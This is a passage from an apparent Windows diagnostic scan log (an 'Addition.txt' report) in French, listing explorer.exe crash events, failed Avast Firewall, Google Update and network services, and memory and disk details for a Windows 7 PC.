Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x177c
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:37:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x65929617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x158c
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:36:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x65929617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x1074
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
System errors:
=============
Error: (02/19/2016 01:33:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Service Google Update (gupdate) n’a pas pu démarrer en raison de l’erreur :
%%2
Error: (02/19/2016 01:31:24 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Le Gestionnaire de services de contrôle a essayé d’entreprendre une action corrective (Restart the service) après la fin inattendue du service Avast Firewall, mais cette action a échoué en raison de l’erreur suivante :
%%1056
Error: (02/19/2016 01:31:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Le pilote de démarrage système ou d’amorçage suivant n’a pas pu se charger :
aswNetSec
Error: (02/19/2016 01:31:19 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Avast Firewall s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 5000 millisecondes : Restart the service.
Error: (02/19/2016 01:31:06 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Le service Function Discovery Resource Publication s’est arrêté avec l’erreur :
%%-2147024891
Error: (02/19/2016 01:31:06 PM) (Source: HTTP) (EventID: 15005) (User: )
Description: \Device\Http\ReqQueue[::]:5357
Error: (02/19/2016 01:31:01 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Le service IKE and AuthIP IPsec Keying Modules s’est arrêté avec l’erreur :
%%13876
Error: (02/19/2016 01:30:47 PM) (Source: NetBT) (EventID: 4307) (User: )
Description: L’initialisation a échoué car le transport a refusé d’ouvrir les adresses initiales.
Error: (02/19/2016 01:30:47 PM) (Source: NetBT) (EventID: 4307) (User: )
Description: L’initialisation a échoué car le transport a refusé d’ouvrir les adresses initiales.
Error: (02/19/2016 01:22:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Service Google Update (gupdate) n’a pas pu démarrer en raison de l’erreur :
%%2
==================== Memory info ===========================
Processor: Intel(R) Core(TM)2 CPU 6420 @ 2.13GHz
Percentage of memory in use: 90%
Total physical RAM: 2029.64 MB
Available physical RAM: 201.83 MB
Total Virtual: 4059.29 MB
Available Virtual: 1319.32 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.75 GB) (Free:233.04 GB) NTFS ==>[drive with boot components (obtained from BCD)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: F6DAF6DA)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================